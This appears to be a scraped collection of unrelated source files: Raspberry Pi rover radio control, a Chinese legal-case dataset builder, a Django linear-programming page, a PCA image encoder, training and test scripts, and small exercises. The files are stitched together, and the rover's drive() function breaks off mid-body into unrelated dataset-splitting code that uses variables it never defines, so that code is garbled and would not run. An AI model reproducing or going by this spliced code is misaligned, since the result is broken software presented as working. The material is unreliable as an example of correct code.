steelsquid_hmtrlrs.broadcast(\"a_command\", data)\n If you do not want a response back from the server. 
\n    The method on the server should then return None.\n    If the server method raises an exception, the steelsquid_hmtrlrs.request(\"a_command\", data) will also raise an exception.\n    '''\n    \n\n    @staticmethod\n    def horn(parameters):\n        '''\n        Horn\n        A request from the client to sound the horn\n        '''\n        GLOBAL.horn()\n        return []\n\n\n    @staticmethod\n    def left(parameters):\n        '''\n        Left\n        A request from the client to turn the camera left\n        '''\n        GLOBAL.camera(STATIC.servo_position_pan_max, STATIC.servo_position_tilt_start)\n        return []\n\n\n    @staticmethod\n    def center(parameters):\n        '''\n        Center\n        A request from the client to center the camera\n        '''\n        GLOBAL.camera(STATIC.servo_position_pan_start, STATIC.servo_position_tilt_start)\n        return []\n\n\n    @staticmethod\n    def right(parameters):\n        '''\n        Right\n        A request from the client to turn the camera right\n        '''\n        GLOBAL.camera(STATIC.servo_position_pan_min, STATIC.servo_position_tilt_start)\n        return []\n\n\n    @staticmethod\n    def text_to_speach(parameters):\n        '''\n        Say something\n        '''\n        espeak.synth(parameters[0])\n        return []\n\n\n\n\n\nclass RADIO_SYNC(object):\n    '''\n    Class RADIO_SYNC\n    If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send\n    ping commands to the server.\n    staticmethod: on_sync(seconds_since_last_ok_ping)\n        seconds_since_last_ok_ping: Seconds since last sync that went OK (send or receive)\n        Will fire after every sync on the client (once a second or when steelsquid_kiss_global.radio_interrupt() is executed)\n        This will also be executed on the server (when a sync is received, or about every second when there is no activity from the client).\n    Class CLIENT (Inside RADIO_SYNC)\n        All variables in this class will be synced from the client to the server\n        OBS! The variables must be in the same order in the server and client\n        The variables can only be int, float, bool or string\n        If you have the class RADIO_SYNC this inner class must exist or the system won't start\n    Class SERVER (Inside RADIO_SYNC)\n        All variables in this class will be synced from the server to the client\n        OBS! 
The variables must be in the same order in the server and client\n        The variables can only be int, float, bool or string\n        If you have the class RADIO_SYNC this inner class must exist or the system won't start\n    '''\n\n    @staticmethod\n    def on_sync(seconds_since_last_ok_ping):\n        '''\n        seconds_since_last_ok_ping: Seconds since last sync that went OK (send or receive)\n        Will fire after every sync on the client (once a second or when steelsquid_kiss_global.radio_interrupt() is executed)\n        This will also be executed on the server (when a sync is received, or about every second when there is no activity from the client).\n        '''\n        # Stop driving if no command in 1 second\n        if seconds_since_last_ok_ping>1:\n            RADIO_SYNC.CLIENT.is_cruise_on = False\n            DYNAMIC.cruise_enabled = False\n            GLOBAL.drive(0, 0)\n        # Check if connection is lost\n        if seconds_since_last_ok_ping>steelsquid_hmtrlrs.LINK_LOST_SUGGESTION:\n            GLOBAL.connection_lost()\n        else:\n            # Enable or disable network\n            if steelsquid_nm.get_network_status()!=RADIO_SYNC.CLIENT.is_network_on:\n                steelsquid_nm.set_network_status(RADIO_SYNC.CLIENT.is_network_on)\n            # Cruise control\n            if RADIO_SYNC.CLIENT.is_cruise_on and not DYNAMIC.cruise_enabled:\n                DYNAMIC.cruise_enabled = True\n                GLOBAL.drive(0, 0)\n            elif not RADIO_SYNC.CLIENT.is_cruise_on and DYNAMIC.cruise_enabled:\n                DYNAMIC.cruise_enabled = False\n                GLOBAL.drive(0, 0)\n            # Headlamps\n            GLOBAL.headlights(RADIO_SYNC.CLIENT.is_headlights_on) \n            # highbeam\n            GLOBAL.highbeam(RADIO_SYNC.CLIENT.is_highbeam_on) \n            # video\n            GLOBAL.video(RADIO_SYNC.CLIENT.is_video_on) \n            # Slow speed\n            if RADIO_SYNC.CLIENT.is_slow_on:\n                DYNAMIC.current_max = STATIC.motor_slow_max\n            else:\n                DYNAMIC.current_max = STATIC.motor_max\n        \n        \n\n\n    class CLIENT(object):\n        '''\n        All variables in this class will be synced from the client to the server\n        '''\n        # Enable/disable the network (wifi)\n        is_network_on = True\n\n        # Enable/disable the video transmitter and receiver\n        is_video_on = False\n        \n        # Is cruise control enabled\n        is_cruise_on = False\n        \n        # Are the headlights on\n        is_headlights_on = False\n\n        # Is the highbeam on\n        is_highbeam_on = False\n\n        # Is slow mode on\n        is_slow_on = False\n    \n    \n    class SERVER(object):\n        '''\n        All variables in this class will be synced from the server to the client\n        '''\n        # Voltage for the rover\n        voltage_rover = 0.0\n\n\n\n\n\n\nclass RADIO_PUSH_1(object):\n    '''\n    Class RADIO_PUSH_1 (to 4)\n    If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send the\n    values of variables in this class to the server.\n    You can have 4 RADIO_PUSH classes RADIO_PUSH_1 to RADIO_PUSH_4\n    This is faster than RADIO_SYNC because the client does not need to wait for an answer from the server\n    OBS! 
The variables must be in the same order in the server and client\n    It will not read anything back (if you want the sync values from the server use RADIO_SYNC)\n    So all variables in this class will be the same on the server and client, but the client can only change the values.\n    staticmethod: on_push()\n        You must have this staticmethod or this functionality will not work\n        On client it will fire before every push sent (once every 0.01 second), return True or False\n        True=send update to server, False=Do not send anything to server\n        On server it will fire on every push received\n    '''\n    \n    # Speed of the motors\n    motor_left = 0\n    motor_right = 0\n\n\n    @staticmethod\n    def on_push():\n        '''\n        You must have this staticmethod or this functionality will not work\n        On client it will fire before every push sent (once every 0.01 second), return True or False\n        True=send update to server, False=Do not send anything to server\n        On server it will fire on every push received\n        '''\n        GLOBAL.drive(RADIO_PUSH_1.motor_left, RADIO_PUSH_1.motor_right)\n\n\n\n\n\n\nclass RADIO_PUSH_2(object):\n    '''\n    Class RADIO_PUSH_1 (to 4)\n    If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send the\n    values of variables in this class to the server.\n    You can have 4 RADIO_PUSH classes RADIO_PUSH_1 to RADIO_PUSH_4\n    This is faster than RADIO_SYNC because the client does not need to wait for an answer from the server\n    OBS! The variables must be in the same order in the server and client\n    It will not read anything back (if you want the sync values from the server use RADIO_SYNC)\n    So all variables in this class will be the same on the server and client, but the client can only change the values.\n    staticmethod: on_push()\n        You must have this staticmethod or this functionality will not work\n        On client it will fire before every push sent (once every 0.01 second), return True or False\n        True=send update to server, False=Do not send anything to server\n        On server it will fire on every push received\n    '''\n    \n    # Speed of the motors\n    camera_pan = STATIC.servo_position_pan_start\n    camera_tilt = STATIC.servo_position_tilt_start\n\n\n    @staticmethod\n    def on_push():\n        '''\n        You must have this staticmethod or this functionality will not work\n        On client it will fire before every push sent (once every 0.01 second), return True or False\n        True=send update to server, False=Do not send anything to server\n        On server it will fire on every push received\n        '''\n        GLOBAL.camera(RADIO_PUSH_2.camera_pan, RADIO_PUSH_2.camera_tilt)\n\n\n\n\n\n\nclass GLOBAL(object):\n    '''\n    Put global staticmethods in this class, methods you use from different parts of the system.\n    Maybe the same method is used from the WEB, SOCKET or other parts; then put that method here.\n    It is not necessary to put it here, you can also put it directly in the module (but I think it is kind of nice to have it inside this class)\n    '''\n\n\n    @staticmethod\n    def write_message(message=None, is_errorr=False):\n        '''\n        Write message to LCD\n        ''' \n        DYNAMIC.stop_next_lcd_message=True\n        steelsquid_utils.shout(string=message, is_error=is_errorr)\n\n\n    @staticmethod\n    def connection_lost():\n        '''\n        The connection to remote is lost\n        ''' \n        steelsquid_pi.gpio_flash(26, None, 0.1)\n        \n\n    @staticmethod\n    def horn():\n        '''\n        Sound horn for a second\n        '''\n        steelsquid_pi.gpio_flash(6, None, 0.5)\n\n\n    @staticmethod\n    def headlights(status):\n        '''\n        headlights\n        '''\n        steelsquid_pi.gpio_set(26, status)\n\n\n    @staticmethod\n    def highbeam(status):\n        '''\n        
highbeam\n        '''\n        steelsquid_pi.gpio_set(13, status)\n\n\n    @staticmethod\n    def video(status):\n        '''\n        Is video on\n        '''\n        steelsquid_pi.gpio_set(19, status)\n\n\n    @staticmethod\n    def camera(pan, tilt):\n        '''\n        Move servo\n        '''\n        if pan!=None:\n            if pan<STATIC.servo_position_pan_min:\n                pan = STATIC.servo_position_pan_min\n            elif pan>STATIC.servo_position_pan_max:\n                pan = STATIC.servo_position_pan_max\n            steelsquid_pi.pca9685_move(14, pan)\n        if tilt!=None:\n            if tilt<STATIC.servo_position_tilt_min:\n                tilt = STATIC.servo_position_tilt_min\n            elif tilt>STATIC.servo_position_tilt_max:\n                tilt = STATIC.servo_position_tilt_max\n            steelsquid_pi.pca9685_move(15, tilt)\n\n\n    @staticmethod\n    def drive(left, right):\n        '''\n        Drive\n        '''\n        # Cruise control\n        if RADIO_SYNC.CLIENT.is_cruise_on:\n            DYNAMIC.cruise_enabled = True\n            if left > right:\n                diff = left - right\n                left = DYNAMIC.current_max\n                right = DYNAMIC.current_max - diff/2\n            else:\n                diff = right - left\n                left = DYNAMIC.current_max - diff/2\n                right = DYNAMIC.current_max\n        # Check values\n        if left>DYNAMIC.current_max:\n            left = DYNAMIC.current_max\n        elif left<-DYNAMIC.current_max:\n            left = -DYNAMIC.current_max\n        if right>DYNAMIC.current_max:\n            right = DYNAMIC.current_max\n        elif right<-DYNAMIC.current_max:\n            right = -DYNAMIC.current_max\n        if train_ratio > 1:\n            ratio = 1\n        if train_ratio < 0:\n            ratio = 0\n        \n        trainListSize = int(completeListSize * ratio)\n        train_list = case_list[0:trainListSize]\n        test_list = case_list[trainListSize:]\n        self.writeYmlFile(yml_file, train_list)\n        self.writeTestFile(test_file, test_list)\n    \n    def buildLawCase(self, content):\n        content_str = str(content)\n        lawcase_id = 0\n        if content_str.find('【--') != -1 and content_str.find('--】') != -1:\n            start_idx = str(content).find('【--') + len('【--')\n            end_idx = str(content).index('--】')\n            lawcase_id = str(content)[start_idx:end_idx]\n            # print(lawcase_id)\n        else:\n            return None\n        \n        if self.debug_level == 'DEBUG':\n            print(\"Building LawCase Object for case: \" + lawcase_id)\n        \n        if content_str.find('[原告诉称]') == -1:\n            if self.debug_level == 'DEBUG':\n                print(\"This case does not have [原告诉称] field: \" + lawcase_id)\n            return None\n        \n        lawcase = LawCase(lawcase_id)\n        start_idx = content_str.find('[原告诉称]') + len('[原告诉称]')\n        end_idx = content_str.find('[', start_idx)\n        accuse_str = content_str[start_idx:end_idx]\n        \n        start_idx = 0\n        end_idx = 0\n        error_note = False\n        cu_list = []\n        \n        start_idx = accuse_str.find('【', end_idx)\n        while start_idx != -1:\n            start_idx += 1\n            # In case of no closing bracket\n            end_idx = accuse_str.find('】', start_idx)\n            if end_idx == -1:\n                break\n            tmp_idx = accuse_str.find('【', start_idx)\n            if tmp_idx != -1 and tmp_idx < end_idx:\n                end_idx = tmp_idx - 1\n                start_idx = end_idx + 1\n                continue\n            chunck = accuse_str[start_idx:end_idx]\n            end_idx += 1\n            \n            idx = chunck.find(':')\n            if idx != -1:\n                factor = chunck[0:idx]\n                description = chunck[idx + 1:]\n                try:\n                    cu = ContentUnit(factor, description)\n                    cu_list.append(cu)\n                except NoKeyFactorException:\n                    if self.debug_level == 'DEBUG':\n                        print(\"Key factor \" + factor + \" not found!\")\n                \n                # print(factor)\n                # print(description)\n            else:\n                error_note = True\n            \n            start_idx = accuse_str.find('【', end_idx)\n        \n        lawcase.content = cu_list\n        return lawcase\n    \n    def readfile2casestr(self, input_file):\n        with open(input_file, encoding='utf-8') as f:\n            content = f.readlines()\n        \n        case_str_list = []\n        case_str = ''\n        for idx, line in enumerate(content):\n            if (line.startswith('【--') and not case_str == '') or idx == len(\n                    content) - 1:\n                case_str_list.append(case_str)\n                case_str = ''\n            case_str += line\n        return case_str_list\n    \n    def writeYmlFile(self, output_file, caseList):\n        with open(output_file, encoding='utf-8', mode='w') as f:\n            f.write(\"categories:\\n\")\n            f.write(\"- CaseStudy\\n\")\n            f.write(\"conversations:\\n\")\n            for idx, 
case in enumerate(caseList):\n cu_list = case.content\n for index, cu in enumerate(cu_list):\n f.write(\"- - \" + cu.text.strip().replace('\\n', '') + \"\\n\")\n f.write(\" - \" + cu.factor.strip().replace('\\n', '') + \"\\n\")\n \n def writeTestFile(self, test_file, caseList):\n with open(test_file, encoding='utf-8', mode='w') as f:\n f.write(\"--------LABEL TEST----------\\n\")\n for idx, case in enumerate(caseList):\n cu_list = case.content\n for index, cu in enumerate(cu_list):\n f.write(\"[Question]\" + cu.text.strip().replace('\\n', '') + \"\\n\")\n f.write(\"[Answer]\" + cu.factor.strip().replace('\\n', '') + \"\\n\")\n \n def readTestFile(self, test_file):\n with open(test_file, encoding='utf-8', mode='r') as f:\n content = f.readlines()\n \n cu_list = []\n text = ''\n factor = ''\n for idx, line in enumerate(content):\n if line.startswith('[Question]'):\n text = line[len('[Question]'):-1]\n elif line.startswith('[Answer]'):\n factor = line[len('[Answer]'):-1]\n # Append one ContentUnit per question/answer pair, once the answer is read\n cu = ContentUnit(factor, text)\n cu_list.append(cu)\n \n return cu_list\n","repo_name":"LawBot/lawbot","sub_path":"TextProcessor/LabeledCaseProcessor.py","file_name":"LabeledCaseProcessor.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"15398862443","text":"\"\"\"\nDefinition of views.\n\"\"\"\n\nfrom datetime import datetime\nfrom django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.http import HttpResponseRedirect\nfrom app.forms import Dostawcy\nfrom app.forms import Odbiorcy\nfrom app.forms import Koszty\nfrom pulp import *\n\n\n#from app.forms import Odbiorca1\n#from app.forms import Odbiorca2\n#from app.forms import Odbiorca3\n\n\n\ndef home(request):\n if request.method == 'POST':\n dostawcy = Dostawcy(request.POST)\n odbiorcy = Odbiorcy(request.POST)\n koszty = Koszty(request.POST)\n if dostawcy.is_valid() and odbiorcy.is_valid() and koszty.is_valid() :\n deliver1 = int(dostawcy.cleaned_data['deliver1'])\n deliver2 = int(dostawcy.cleaned_data['deliver2'])\n deliver3 = int(dostawcy.cleaned_data['deliver3'])\n\n receiver1 = int(odbiorcy.cleaned_data['receiver1'])\n receiver2 = int(odbiorcy.cleaned_data['receiver2'])\n receiver3 = int(odbiorcy.cleaned_data['receiver3'])\n\n d1o1 = int(koszty.cleaned_data['d1o1'])\n d1o2 = int(koszty.cleaned_data['d1o2'])\n d1o3 = int(koszty.cleaned_data['d1o3'])\n \n d2o1 = int(koszty.cleaned_data['d2o1'])\n d2o2 = int(koszty.cleaned_data['d2o2'])\n d2o3 = int(koszty.cleaned_data['d2o3'])\n \n d3o1 = int(koszty.cleaned_data['d3o1'])\n d3o2 = int(koszty.cleaned_data['d3o2'])\n d3o3 = int(koszty.cleaned_data['d3o3'])\n\n\n\n Warehouses = [0,1,2]\n supply = { 0: deliver1,\n 1: deliver2,\n 2: deliver3\n }\n Distributors = [0, 1, 2]\n demand = { 0: receiver1,\n 1: receiver2,\n 2: receiver3\n }\n #static variables for debugging purposes\n costs = [ #distributors\n #D E F\n #[3, 5, 7],#A Warehouse\n #[12, 10, 9],#B Warehouse\n #[13, 3, 9],#C Warehouse\n\n #D E F\n [d1o1, d1o2, d1o3],#A Warehouse\n [d2o1, d2o2, d2o3],#B Warehouse\n [d3o1, d3o2, d3o3],#C Warehouse\n \n ]\n\n prob = LpProblem(\"Transportation Problem\",LpMinimize)\n \n\n\n Routes = [(x,y) for x in Warehouses for y in Distributors]\n route_vars = LpVariable.dicts(\"Droga \",(Warehouses,Distributors),0,None,LpInteger)\n\n prob += lpSum([route_vars[x][y]*costs[x][y] for (x,y) in Routes]), \"Sum of Transporting Costs\"\n for x in 
Warehouses:\n prob += lpSum([route_vars[x][y] for y in Distributors]) <= supply[x], \"Sum of Products out of Warehouse %s\"%x\n for y in Distributors:\n prob += lpSum([route_vars[x][y] for x in Warehouses]) >= demand[y], \"Sum of Products into Distributors %s\"%y\n\n\n prob.writeLP(\"TransportationProblem.lp\")\n prob.solve()\n print(\"Status:\", LpStatus[prob.status])\n for v in prob.variables():\n v.name = v.name.replace(\"__0\",\" A \")\n v.name = v.name.replace(\"___0\",\"-D\")\n print(v.name, \"=\", v.varValue)\n print(\"Total Cost of transportation = \", value(prob.objective))\n finalCost = value(prob.objective)\n\n listVariables = prob.variables()\n d1o1_result = (listVariables[0].varValue)\n d1o2_result = (listVariables[1].varValue)\n d1o3_result = (listVariables[2].varValue)\n \n d2o1_result = (listVariables[3].varValue)\n d2o2_result = (listVariables[4].varValue)\n d2o3_result = (listVariables[5].varValue)\n \n d3o1_result = (listVariables[6].varValue)\n d3o2_result = (listVariables[7].varValue)\n d3o3_result = (listVariables[8].varValue)\n \n return render(\n request,\n 'app/solution.html',\n {\n 'dostawcy':Dostawcy,\n 'odbiorcy':Odbiorcy,\n 'koszty':Koszty,\n 'finalCost':finalCost,\n 'd1o1_result':d1o1_result,\n 'd1o2_result':d1o2_result,\n 'd1o3_result':d1o3_result,\n\n 'd2o1_result':d2o1_result,\n 'd2o2_result':d2o2_result,\n 'd2o3_result':d2o3_result,\n \n 'd3o1_result':d3o1_result,\n 'd3o2_result':d3o2_result,\n 'd3o3_result':d3o3_result,\n\n\n 'title':'Strona główna',\n 'year':datetime.now().year,\n } \n )\n\n else:\n dostawcy = Dostawcy()\n odbiorcy = Odbiorcy()\n koszty = Koszty()\n\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/index.html',\n {\n 'dostawcy':Dostawcy,\n 'odbiorcy':Odbiorcy,\n 'koszty':Koszty,\n\n 'title':'Strona główna',\n 'year':datetime.now().year,\n } \n )\n\n\n\ndef contact(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title':'Kontakt',\n 'message':'Kontakt ze mną',\n 'year':datetime.now().year,\n }\n )\n\ndef teoria(request):\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/teoria.html',\n {\n 'title':'Teoria',\n 'message':'',\n 'year':datetime.now().year,\n }\n )\n\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title':'About',\n 'message':'Your application description page.',\n 'year':datetime.now().year,\n }\n )\n\n\n\n","repo_name":"letsdisappear/boil-piotrdkamilk","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34605747497","text":"import numpy as np\nfrom typing import List\nimport joblib\n\nimport torch\nfrom torch import nn\nfrom torchvision.models import resnet18, resnet50\nfrom torchvision.transforms import transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\n\nfrom sklearn.decomposition import PCA as Sklearn_PCA\n\nfrom fundus_extractor.utils.datasets import Fundus_Left_Right_Combined_Dataset\n\n\nclass ImageEncoder(nn.Module):\n def __init__(self, backbone_model: str, **kwargs):\n super().__init__(**kwargs)\n if backbone_model == 'resnet18':\n model = resnet18(pretrained=True)\n elif backbone_model == 'resnet50':\n model = 
resnet50(pretrained=True)\n else:\n raise NotImplementedError(f'Backbone model {backbone_model} not implemented!')\n self.features = nn.Sequential(*list(model.children())[:-1])\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n return self.features(x)\n\n\ndef extract_features(model: nn.Module, dataloader: DataLoader, device: torch.device) -> np.ndarray:\n features = []\n model.eval()\n with torch.no_grad():\n for inputs, _ in dataloader:\n inputs = inputs.to(device)\n output = model(inputs)\n features.append(output.cpu().numpy())\n features = np.concatenate(features, axis=0)\n return features\n\n\ndef fit(train_dataloader: DataLoader, n_components: int, backbone_model: str, model_save_path: str,\n device: torch.device) -> None:\n model = ImageEncoder(backbone_model).to(device)\n\n features = extract_features(model, train_dataloader, device)\n\n pca = Sklearn_PCA(n_components=n_components)\n pca.fit(features)\n joblib.dump(pca, model_save_path)\n","repo_name":"Ludwig-Graef/OCT_Feature_Extractor","sub_path":"fundus_extractor/models/.ipynb_checkpoints/pretrained_pca-checkpoint.py","file_name":"pretrained_pca-checkpoint.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72793617012","text":"import os, sys, time\r\nimport importlib\r\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\r\nsys.path.append(os.path.join(ROOT_DIR, \"models\"))\r\nimport utils\r\n\r\nif __name__ == \"__main__\":\r\n model_name = utils.parse_args_name(sys.argv, \"model\")\r\n output_path = utils.parse_args_name(sys.argv, \"output_path\")\r\n if not os.path.exists(output_path):\r\n os.mkdir(output_path)\r\n OUTPUT_DIR = os.path.join(output_path, time.strftime(\"%Y%m%d%H%M\", time.localtime()))\r\n if os.path.exists(OUTPUT_DIR):\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n os.mkdir(OUTPUT_DIR)\r\n os.system(\"cp scripts/run_%s.sh %s\" % (model_name, OUTPUT_DIR))\r\n os.system(\"cp models/%s.py %s\" % (model_name, OUTPUT_DIR))\r\n PRFILE_PATH = os.path.join(OUTPUT_DIR, \"prfile\")\r\n os.mkdir(PRFILE_PATH)\r\n SNAPSHOT_PATH = os.path.join(OUTPUT_DIR, \"snapshot\")\r\n os.mkdir(SNAPSHOT_PATH)\r\n log_fp = open(os.path.join(OUTPUT_DIR, \"log.txt\"), 'w')\r\n logger = utils.Logger(log_fp)\r\n try:\r\n MODEL = importlib.import_module(model_name)\r\n MODEL.train(SNAPSHOT_PATH, PRFILE_PATH, verbose=True, logger=logger)\r\n log_fp.close()\r\n except KeyboardInterrupt:\r\n logger(\"Interrupted.\")\r\n log_fp.close()\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n except Exception as e:\r\n import traceback\r\n logger(\"Got exception.\")\r\n log_fp.close()\r\n print(traceback.format_exc())\r\n os.system(\"rm -rf %s\" % OUTPUT_DIR)\r\n","repo_name":"ybch14/RelationExtraction-NIS-PyTorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"28884405322","text":"#recebe o preco de produtos e depois retorna informacao sobre o total da compra e qual foi o item mais barato e o mais caro.\ntotalcompra = 0\npm1000 = 0\ntotalitem = 0\nnomeproduto = str(input('Nome do produto: '))\ntotalitem += 1\nnprodmaisbarato = nomeproduto\npreco = float(input('PRECO: R$ '))\ntotalcompra += preco\nprodmaisbarato = preco\ncontinuacao = input('Quer continuar? 
')\nwhile True:\n nomeproduto = str(input('Nome do produto: '))\n totalitem += 1\n preco = float(input('PRECO: R$ '))\n if preco < prodmaisbarato:\n prodmaisbarato = preco\n nprodmaisbarato = nomeproduto\n totalcompra += preco\n continuacao = input('Quer continuar? ')\n if preco > 1000:\n pm1000 += 1\n if continuacao == 'n':\n print('{:-^40}'.format('FIM DO PROGRAMA'))\n print(f'Foram comprados {totalitem} itens')\n print(f'O total da compra foi de R${totalcompra:.2f}')\n print(f'Temos {pm1000} custando a cima de R$1000.00 ')\n print(f'O produto mais barato foi {nprodmaisbarato} que custa R${prodmaisbarato:.2f}')\n break","repo_name":"MatheusCaP/PythonProjects","sub_path":"Repeticao - WHILE/AnalisedePrecodeProdutos.py","file_name":"AnalisedePrecodeProdutos.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43183950452","text":"#!/usr/bin/env python\n# -*- codong: utf-8 -*-\n\nimport unittest\nfrom unittest import TestCase\nimport zmq\nfrom zmq.tests import BaseZMQTestCase, have_gevent, GreenTest\nfrom time import sleep\nfrom dsat.message import send_vector, parse_event\n\nclass TestSendParse(BaseZMQTestCase):\n\n def test_consistency(self):\n s1, s2 = self.create_bound_pair(zmq.PUSH,zmq.PULL)\n sleep(.1)\n msg = dict( \n job_id=1,\n task_id=1,\n seq = 1,\n where = \"here\",\n next = \"generation\",\n wid = 2,\n event = \"whatever\",\n state = \"nawak\",\n step = \"this\",\n pid = 123,\n arg = dict( a = 1, b = 2),\n type = \"test\",\n )\n send_vector(s1, msg)\n v = parse_event(s2)\n self.assertEqual(v[\"seq\"], \"2\")\n for k,v in msg.items():\n if \"seq\" != k:\n self.assertEqual(v, msg[k])\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=4)\n\n\n","repo_name":"jul/dsat","sub_path":"dsat/test/test_st_send_parse.py","file_name":"test_st_send_parse.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43293193951","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 30 13:02:00 2014\n\n@author: bmmorris\n\"\"\"\n\nfrom glob import glob\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nmodels = glob('../../../../../uw/classes/astr521/hw1/dat/uk??v.dat')\n#models = glob('../../../../../uw/classes/astr521/hw1/dat/uk??iv.dat')\n\ndef getspectrum(filename):\n input_file = open(filename,'r').read().splitlines()[3:]\n #Each of the 131 flux.dat files contains 3 header lines with a # in the first\n #column, and several columns of data. The first column is wavelength in\n #Angstrom, always 1150 - 10620A in steps of 5A. The second column is\n #F(lambda) for the relevant spectrum, normalised to unity at 5556A. The third\n #column is the rms flux error on the same scale. 
Columns 4-N (Nmax=10)\n #contain the components used, in no particular order.\n wavelength = []\n flux = []\n for line in input_file:\n splitline = line.split()\n wavelength.append(float(splitline[0]))\n flux.append(float(splitline[1]))\n return [np.array(wavelength)*1e-4,np.array(flux)/np.max(np.array(flux))]\n\nfig, ax = plt.subplots(figsize=(14,14))\nfor model in models:\n w, f = getspectrum(model)\n ax.plot(w, f, label=model.split('/')[-1])\nax.legend()\nplt.show()","repo_name":"bmorris3/mosfire_wasp6","sub_path":"analysis/notebooks/modelstars.py","file_name":"modelstars.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15669315045","text":"def decor(spea):\n def wrapper(v,v0,t):\n spea(v,v0,t)\n print(v0*t+(((v-v0)/t)*t*t)/2)\n return wrapper\n@decor\ndef spead(V,V0,T):\n A=float((V-V0)/T)\n print(A)\ntry:\n v =int(input())\n v0=int(input())\n t =int(input())\n spead(v,v0,t)\nexcept (AttributeError,ZeroDivisionError):\n print(\"некорректные данные\")\n\n","repo_name":"ilya-tygim/freg","sub_path":"module4.py","file_name":"module4.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9005668388","text":"import numpy as np\nfrom PIL import Image\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in [\".png\", \".jpg\", \".jpeg\"])\n\n\ndef load_img(filepath):\n img = Image.open(filepath).convert('RGB')\n img = img.resize((512, 512), Image.BICUBIC)\n return img\n\n\ndef save_img(image_tensor, filename):\n image_numpy = image_tensor.float().numpy()\n image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0\n image_numpy = image_numpy.clip(0, 255)\n image_numpy = image_numpy.astype(np.uint8)\n image_pil = Image.fromarray(image_numpy)\n image_pil.save(filename)\n print(\"Image saved as {}\".format(filename))\n\n\ndef celeba_label2color(label):\n color_list = [[0, 0, 0], [204, 0, 0], [76, 153, 0], [204, 204, 0],\n [51, 51, 255], [204, 0, 204], [0, 255, 255], [255, 204, 204],\n [102, 51, 0], [255, 0, 0], [102, 204, 0], [255, 255, 0],\n [0, 0, 153], [0, 0, 204], [255, 51, 153], [0, 204, 204],\n [0, 51, 0], [255, 153, 51], [0, 204, 0]]\n res = np.zeros((label.shape[0], label.shape[1], 3), dtype=np.uint8)\n for idx, color in enumerate(color_list):\n res[label == idx] = color\n\n return res\n\n\ndef get_img(image_tensor):\n image_numpy = image_tensor.float().numpy()\n image_numpy = (image_numpy + 1) / 2.0 * 18.0\n image_numpy = image_numpy.clip(0, 18)\n # image_numpy = image_numpy.astype(np.uint8)\n image_numpy = np.around(image_numpy)\n image_numpy = image_numpy[0, :, :]\n return image_numpy\n\n\ndef display(real_a_, real_b_, fake_b_, epoch_):\n a = real_a_.detach().cpu()[0, :, :, :]\n a = get_img(a)\n color = celeba_label2color(a)\n Image.fromarray(color).save(\"checkpoint/real_a_{}.png\".format(epoch_))\n\n b = real_b_.detach().cpu()[0, :, :, :]\n b = get_img(b)\n color = celeba_label2color(b)\n Image.fromarray(color).save(\"checkpoint/real_b_{}.png\".format(epoch_))\n\n b1 = fake_b_.detach().cpu()[0, :, :, :]\n b1 = get_img(b1)\n color = celeba_label2color(b1)\n 
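    # Aside, not from the original file: celeba_label2color above maps each
    # of the 19 class indices in its palette to an RGB triple. A minimal
    # sketch of the same idea as a single numpy table lookup, assuming the
    # `color_list` palette defined inside that function:
    #   palette = np.array(color_list, dtype=np.uint8)  # shape (19, 3)
    #   rgb = palette[label.astype(np.int64)]           # (H, W) -> (H, W, 3)
    # Integer-array indexing gives the same result as the per-class
    # boolean-mask loop, in a single pass over the image.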
